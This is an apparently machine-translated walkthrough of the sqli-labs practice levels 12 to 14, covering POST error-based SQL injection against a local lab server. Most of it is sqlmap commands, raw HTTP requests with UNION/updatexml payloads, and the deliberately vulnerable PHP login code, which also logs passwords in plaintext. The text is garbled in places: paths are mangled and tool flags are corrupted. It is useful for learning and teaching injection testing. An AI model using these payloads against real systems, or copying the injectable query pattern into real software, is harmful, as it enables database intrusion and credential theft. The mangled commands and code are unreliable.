- Less-12-post-error based-double quotes-string
1) Knowledge points
This paper mainly investigates the case of double quotation mark closure injection in error injection.
2) Tool Usage:
Sqlmap Post Injection usage, add * at the injection point, or you can use-"http://127.0.0.1/hacker/sqli-labs-master/Less-12/ index.php"uname=111*&passwd=111&submit=submit "-- Batch--technique BES
3) Manual Injection
post/hacker/sqli-labs-master/less- A/index.php?id=1http/1.1Host:127.0.0.1User-agent:mozilla/5.0(Windows NT10.0; WOW64; Rv:46.0) gecko/20100101firefox/46.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*; Q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, DeflateConnection: closecontent-type:application/x-www-form-urlencodedcontent-length:98 uname=111 ") UNION all SELECT 1,updatexml (1, Concat (0x7e,database ()), 1) #&passwd=111&submit=submit
4) Injection Point code
//Take the variablesif(Isset ($_post['uname']) && Isset ($_post['passwd']) {$uname=$_post['uname']; $passwd=$_post['passwd']; //Logging The connection parameters to a file for analysis.$FP =fopen ('Result.txt','a'); fwrite ($FP,'User Name:'. $uname."\ n"); fwrite ($FP,'Password:'. $passwd."\ n"); fclose ($FP); //Connectivity$uname ='"'. $uname.'"'; Double quotation mark closure $passwd='"'. $passwd.'"'; @ $sql="SELECT username, password from users WHERE username= ($uname) and password= ($passwd) LIMIT 0,1"; $result=mysql_query ($sql); $row= Mysql_fetch_array ($result);
- Less-13-double Injection-string-with Twist
1) Knowledge points
This paper mainly investigates the case of single quotation mark + parenthesis closure injection in error injection.
2) Tool Usage:
" http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php " " Uname=111*&passwd=111&submit=submit " Ten --batch--technique BES
3) Manual Injection
post/hacker/sqli-labs-master/less- -/index.php?id=1http/1.1Host:127.0.0.1User-agent:mozilla/5.0(Windows NT10.0; WOW64; Rv:46.0) gecko/20100101firefox/46.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*; Q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, DeflateConnection: closecontent-type:application/x-www-form-urlencodedcontent-length:93 uname=111 ') union Select 1,updatexml (1,concat (0x7e,database ()), 1) #&passwd=111&submit=submit
4) Injection Point generation code
//Take the variablesif(Isset ($_post['uname']) && Isset ($_post['passwd']) {$uname=$_post['uname']; $passwd=$_post['passwd']; //Logging The connection parameters to a file for analysis.$FP =fopen ('Result.txt','a'); fwrite ($FP,'User Name:'. $uname."\ n"); fwrite ($FP,'Password:'. $passwd."\ n"); fclose ($FP); //Connectivity@ $sql ="SELECT username, password from users WHERE username= (' $uname ') and password= (' $passwd ') LIMIT 0,1"; $result=mysql_query ($sql); $row= Mysql_fetch_array ($result);
- Less-14-double injection-double quotes-string
1) Tool Usage:
" http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php " " Uname=111*&passwd=111&submit=submit " Ten --batch--technique BES
2) Manual Injection
post/hacker/sqli-labs-master/less- -/index.php http/1.1Host:127.0.0.1User-agent:mozilla/5.0(Windows NT10.0; WOW64; Rv:46.0) gecko/20100101firefox/46.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*; Q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, DeflateConnection: closecontent-type:application/x-www-form-urlencodedcontent-length:92 uname=111 "union Select 1,updatexml (1,concat ( 0x7e,database ()), 1) #&passwd=111&submit=submit
3) Injection Point generation code
if(Isset ($_post['uname']) && Isset ($_post['passwd']) {$uname=$_post['uname']; $passwd=$_post['passwd']; //Logging The connection parameters to a file for analysis.$FP =fopen ('Result.txt','a'); fwrite ($FP,'User Name:'. $uname."\ n"); fwrite ($FP,'Password:'. $passwd."\ n"); fclose ($FP); //Connectivity$uname ='"'. $uname.'"'; $passwd='"'. $passwd.'"'; @ $sql="SELECT username, password from users WHERE username= $uname and password= $passwd LIMIT 0,1"; $result=mysql_query ($sql); $row= Mysql_fetch_array ($result);
"Mysql SQL Inject" "Getting Started" Sqli-labs using part 2